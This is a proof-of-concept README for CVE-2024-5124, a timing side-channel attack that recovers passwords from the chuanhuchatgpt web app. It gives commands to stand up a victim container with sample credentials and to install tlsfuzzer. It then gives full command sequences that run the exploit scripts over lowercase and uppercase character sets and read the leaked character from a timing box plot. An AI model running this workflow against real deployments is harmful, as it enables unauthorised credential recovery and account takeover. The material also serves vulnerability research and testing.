CVE-2024-5124 PoC — Timing Attack Vulnerability in gaizhenbiao/chuanhuchatgpt

Source

Associated Vulnerability

Readme

# deploy victim server:

# Install docker

```bash
# Install packages required for the installation

sudo apt-get update
sudo apt install --yes ca-certificates curl
sudo install -m 0755 -d /etc/apt/keyrings
sudo curl -fsSL https://download.docker.com/linux/debian/gpg -o /etc/apt/keyrings/docker.asc
sudo chmod a+r /etc/apt/keyrings/docker.asc

# Add the repository to Apt sources:

echo \
  "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.asc] https://download.docker.com/linux/debian \
  $(. /etc/os-release && echo "$VERSION_CODENAME") stable" | \
  sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
sudo apt-get update
# Download GPG key and store repository in the system

curl -fsSL https://download.docker.com/linux/debian/gpg | gpg --dearmor -o /usr/share/keyrings/docker.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker.gpg] https://download.docker.com/linux/debian bookworm stable" |tee /etc/apt/sources.list.d/docker.list > /dev/null 
apt update 

# Install Docker packages

sudo apt install --yes docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin
```

# Run victim server

```bash
export JSON='{
    "users": [["openai", "isCloseAi"]]
}' ; sudo docker run -e language=en_US -it tuchuanhuhuhu/chuanhuchatgpt:20240310 /bin/bash -c "apt update && apt install --yes git && pip install itsdangerous gradio && echo '${JSON}' > config.json && sed -i 's/share=share/share=True/g' ChuanhuChatbot.py && python3 -u ChuanhuChatbot.py 2>&1 | tee /var/log/application.log"
```


# deploy exploit:

# I Install tlsfuzzer

```bash
sudo apt install --yes virtualenv
virtualenv -p python3 venv3
source venv3/bin/activate
pip install --pre tlslite-ng
git clone https://github.com/tlsfuzzer/tlsfuzzer
```

# II Run exploit

The argument `--clock-frequency` always must be set to `1000` like for example `--clock-frequency 1000`. No need to Guess your clock with: `watch -n 1 "cat /proc/cpuinfo | grep 'MHz'"` in python.

lowercase:

```bash
rm -r tmpdir/ && mkdir tmpdir/ ;
python3 CVE-2024-5124/main.py -r 10000 -c a -c b -c c -c d -c e -c f -c g -c h -c i -c j -c k -c l -c m -c n -c o -c p -c q -c r -c s -c t -c u -c v -c w -c x -c y -c z "out.csv" &&
PYTHONPATH=tlsfuzzer ./tlsfuzz-venv/bin/python ./CVE-2024-5124/step2like.py -r 1000 -c a -c b -c c -c d -c e -c f -c g -c h -c i -c j -c k -c l -c m -c n -c o -c p -c q -c r -c s -c t -c u -c v -c w -c x -c y -c z -o ./tmpdir/ &&
PYTHONPATH=tlsfuzzer tlsfuzz-venv/bin/python3 tlsfuzzer/tlsfuzzer/extract.py --raw-times out.csv -o ./tmpdir/ --clock-frequency 1000 -l ./tmpdir/log.csv &&
PYTHONPATH=tlsfuzzer tlsfuzz-venv/bin/python3 tlsfuzzer/tlsfuzzer/analysis.py -o tmpdir/ --verbose
```

uppercase:

```bash
rm -r tmpdir/ && mkdir tmpdir/ ;
python3 CVE-2024-5124/main.py -r 100 -c a -c b -c c -c d -c e -c f -c g -c h -c i -c j -c k -c l -c m -c n -c o -c p -c q -c r -c s -c t -c u -c v -c w -c x -c y -c z -c A -c B -c D -c E -c F -c G -c H -c I -c J -c K -c L -c M -c N -c O -c P -c Q -c R -c S -c T -c U -c V -c W -c X -c Y -c Z "out.csv" &&
PYTHONPATH=tlsfuzzer ./tlsfuzz-venv/bin/python ./CVE-2024-5124/step2like.py -r 100 -c a -c b -c c -c d -c e -c f -c g -c h -c i -c j -c k -c l -c m -c n -c o -c p -c q -c r -c s -c t -c u -c v -c w -c x -c y -c z -c A -c B -c D -c E -c F -c G -c H -c I -c J -c K -c L -c M -c N -c O -c P -c Q -c R -c S -c T -c U -c V -c W -c X -c Y -c Z -o ./tmpdir/ &&
PYTHONPATH=tlsfuzzer tlsfuzz-venv/bin/python3 tlsfuzzer/tlsfuzzer/extract.py --raw-times out.csv -o ./tmpdir/ --clock-frequency 1000 -l ./tmpdir/log.csv &&
PYTHONPATH=tlsfuzzer tlsfuzz-venv/bin/python3 tlsfuzzer/tlsfuzzer/analysis.py -o tmpdir/ --verbose
```


full:

```bash
rm -r tmpdir/ && mkdir tmpdir/ ;
python3 CVE-2024-5124/main.py -r 100 -c a -c b -c c -c d -c e -c f -c g -c h -c i -c j -c k -c l -c m -c n -c o -c p -c q -c r -c s -c t -c u -c v -c w -c x -c y -c z -c A -c B -c D -c E -c F -c G -c H -c I -c J -c K -c L -c M -c N -c O -c P -c Q -c R -c S -c T -c U -c V -c W -c X -c Y -c Z "out.csv" &&
PYTHONPATH=tlsfuzzer ./tlsfuzz-venv/bin/python ./CVE-2024-5124/step2like.py -r 100 -c a -c b -c c -c d -c e -c f -c g -c h -c i -c j -c k -c l -c m -c n -c o -c p -c q -c r -c s -c t -c u -c v -c w -c x -c y -c z -c A -c B -c D -c E -c F -c G -c H -c I -c J -c K -c L -c M -c N -c O -c P -c Q -c R -c S -c T -c U -c V -c W -c X -c Y -c Z -o ./tmpdir/ &&
PYTHONPATH=tlsfuzzer tlsfuzz-venv/bin/python3 tlsfuzzer/tlsfuzzer/extract.py --raw-times out.csv -o ./tmpdir/ --clock-frequency 2591 -l ./tmpdir/log.csv &&
PYTHONPATH=tlsfuzzer tlsfuzz-venv/bin/python3 tlsfuzzer/tlsfuzzer/analysis.py -o tmpdir/ --verbose
```

Then the guessed character will be the one with the toppest (hightest) value in the file ./tmpdir/box_plot.png

File Snapshot

 [4.0K]  /data/pocs/b96037819b58c46ef1f553213663ac62334da961
├── [1.0K]  main.py
├── [4.7K]  README.md
└── [1.9K]  step2like.py

0 directories, 3 files

Remarks